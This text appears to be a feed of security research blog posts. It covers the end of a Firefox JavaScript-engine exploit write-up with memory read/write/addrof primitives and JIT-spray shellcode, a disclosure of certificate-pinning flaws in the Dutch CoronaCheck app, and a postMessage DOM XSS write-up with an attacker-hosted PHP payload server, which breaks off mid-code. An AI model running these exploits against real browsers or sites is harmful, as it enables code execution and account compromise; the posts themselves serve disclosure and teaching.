       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ...); // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ...); // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
    for(let i = 32; i >= 0; i--) {
        // Shift the accumulator and set the lowest bit if this argument reads
        // back as undefined (i.e. its bit is set in the deleted-arguments bitmap)
        val = val << 1;
        if(arg[i] == undefined) {
            val = val | 1;
        }
    }
    return val;
}

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.
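In script form the limitation looks like this (the comments describe the engine-side effect, which is not directly observable from JavaScript):

function f(x) {
    delete arguments[0]; // sets bit 0 in the RareArgumentsData bitmap

    arguments[0] = 1;    // does not clear the bit; instead a regular property
                         // named "0" is created in a new slots backing store
}
f(0);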

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straightforward by iterating backwards from the RareArgumentsData pointer (as ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
    return (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]);
}

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 
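A sketch of the remaining steps, assuming the addrof, weak_read32, and write primitives built earlier are available (the iteration count and the walk from the JSFunction to its JIT code are illustrative, not the actual offsets):

// Run the function enough times for IonMonkey to compile it, placing the
// constants above into a read-execute region.
for (let i = 0; i < 20000; i++) { // assumed warm-up count
    shellcode();
}

// Conceptually: addrof(shellcode) plus a few weak_read32() calls locate the
// JITted code, a scan finds the 0x41414141 marker constant, and write() is
// then used to redirect the function's JIT entry pointer at the sprayed
// constants before calling shellcode() one final time.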

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives was found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier, can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is referred to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued by a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must also be signed. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262}

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates; by applying the platform verification, a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, so this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous issue and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149}
150
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188}
189
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227}

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificate was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email address in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127}

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.
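To make the confusion concrete, here is the parsing step re-implemented in JavaScript purely for illustration (the Swift code above performs the equivalent split and trim):

// Human-readable SAN output for such a certificate looks roughly like:
//   email:"a,*,b"@example.com
var san = 'email:"a,*,b"@example.com';

// Splitting on commas, as compareSan does, produces three "names":
//   'email:"a'   '*'   'b"@example.com'
var patterns = san.split(",").map(function (s) { return s.trim(); });

// The bare '*' is then used as a wildcard pattern that matches any host.
console.log(patterns); // [ 'email:"a', '*', 'b"@example.com' ]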

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not anchored on the right, also making it possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96}

SignatureValidator.kt lines 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government), it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after one another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this cannot be used to intercept connections either. However, it was already being triggered in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop when we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controlled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production", window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com'. This URL would then be used in a POST request. The response would be parsed as JSON and used to set window.settingsSync. Next, window.settingsSync.versionNumber was used to construct a URL that loaded a new JavaScript file: var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain that could serve a malicious response to the POST request.
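To see the rearrangement concretely, here is a minimal standalone reproduction of the vulnerable concatenation with the malicious region value (not the original file, just the relevant lines):

// Minimal reproduction of the vulnerable concatenation
var region = ".my.website/malicious.php?_bad";   // attacker-controlled window.settingsSync.region
var subdomain = region.split("_")[1] + '-' + region.split("_")[0];
var domain = 'https://' + subdomain + '.settingsSync.com';
console.log(domain); // https://bad-.my.website/malicious.php?.settingsSync.com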

Diagram 1

I created malicious.php on my server to return a valid response, modelled on responses captured from the original target, and changed the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!
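A minimal sketch of what such an attacker page could look like (the fixed delay is illustrative; a real exploit would wait until the child window and its iFrame have actually loaded):

<script>
// Open the page that embeds the vulnerable chat iFrame
var child = window.open("https://feedback.companyA.com/");

// Give the child window and its iFrame time to load, then deliver the payload
setTimeout(function () {
  child.frames[1].postMessage({
    type: "ChatSettings",
    iframeChatSettings: {
      environment: "production",
      region: ".my.website/malicious.php?_bad"
    }
  }, "*");
}, 5000);
</script>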

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
